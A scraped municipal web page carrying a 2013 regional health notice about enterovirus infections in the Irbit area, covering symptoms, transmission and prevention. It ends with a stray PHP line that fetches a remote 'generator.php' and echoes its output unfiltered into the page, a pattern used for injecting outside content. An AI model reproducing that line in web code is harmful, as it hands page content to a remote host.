Регистрация нового пользоателя


День открытых дверей в комплексном центре социального обслуживания населения г.Ирбита и Ирбитского района
День открытых дверей в комплексном центре социального обслуживания населения г.Ирбита и Ирбитского района
Энтеровирусы опасны !

2013-09-11 13:43:10
Энтеровирусы опасны !

Энтеровирусы опасны !

 

По  информации Роспотребнадзора в текущем году продолжается эпидемический подъем заболеваемости энтеровирусной инфекцией (ЭВИ), начавшийся в 2012 году. Превышение среднемноголетних уровней заболеваемости регистрируется в восьми субъектах Российской Федерации, включая Свердловскую область, где ЭВИ зарегистриролваны в 14 муниципальных образованиях, в том числе в г.Тавде – 2 случая среди детей, в Ирбитском районе - 1 случай среди взрослых.

Под энтеровирусной инфекцией понимают группу острых инфекционных болезней, которые вызываются энтеровирусами (вирусами, активизирующимися в кишечнике). Известно свыше 60 видов возбудителей, которые могут вызвать энтеровирусную инфекцию. По данным лабораторных исследований в 2013 году в Свердлвской области у больных ЭВИ выделяются энтеровирусыКоксаки  (4 разновидности), Экхо (2 разновидности) и энтеровирусы 71А типа.

Заболевания протекают в тяжелой и среднетяжелой клинических формах. Наиболее распространены симптомы серозного менингита, герпетической ангины, экзантемы конечностей, респираторных явлений по типу ларингофарингита («малая» болезнь), возможны кишечные формы инфекции, проявляющиеся в виде гастроэнтерита (диарея, боли в животе, метеоризм, рвота) и др. К основному заболеванию может присоединяться бактериальная инфекция, вызванная условно-патогенной флорой, приводящая к утяжелению клинического течения заболеваний.

Для энтеровирусныхифекций характерна летне-осенняя сезонность. В это время года чаще возникают вспышки ЭВИ, обусловленные высокой восприимчивостью к вирусам населения, в первую очередь – детского. Основной механизм передачи инфекции – фекально-оральный, реализуемый водным путем (пусковой) при купании в загрязненных водоемах. В дальнейшем к указанному пути передачи присоединяется контактно-бытовой. Заражение может происходить через загрязненные воду, пищу и окружающие предметы. Возможен  механизм передачи инфекции, реализуемый воздушно-капельным и воздушно-пылевым путем.

Профилактика

Специфическая профилактика (вакцинопрофилактика) энтеровирусных инфекций не разработана. В целях предупреждения эпидемического распространения ЭВИ требуется соблюдение санитано-гигиенических и противоэпидемических требований:

- по своевременному выявлению больных, подозрительных на заболевания ЭВИ, своевременному проведению в очаге ифекции первичных противоэпидемичекихмеропрятий, в том числе дезинфекционных, недопущению больных в детские коллективы;

- по соблюдению личной гигиены, питьевого режима (использование для питья воды только гарантированного качества – бутилированной, кипяченной);

- купание в водоемах, соответствующих санитарно-эпидемиологическим требованиям (при наличии соответствующих санитарно-эпидемиологических заключений);

- безусловное соблюдение требований, установленных санитарно-эпидемиологическими правилами и нормативами для летних оздоровительных, дошкольных учреждений и школ, особенно в части организации питьевого водоснабжения и питания;

- проведение комплекса санитарно-противоэпидемических и инженерно-технических мероприятий по обеспечению населения доброкачественной питьевой водой, соответствующей требованиям СанПиН по микробиологическим показателям, по своевременной и качественной санитарной очистке территорий населенных пунктов.

 

Ирбитский отдел Управления Роспотребнадзора

по Свердловской области

 

В.С.Гооге

8-9122452091

 

 




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>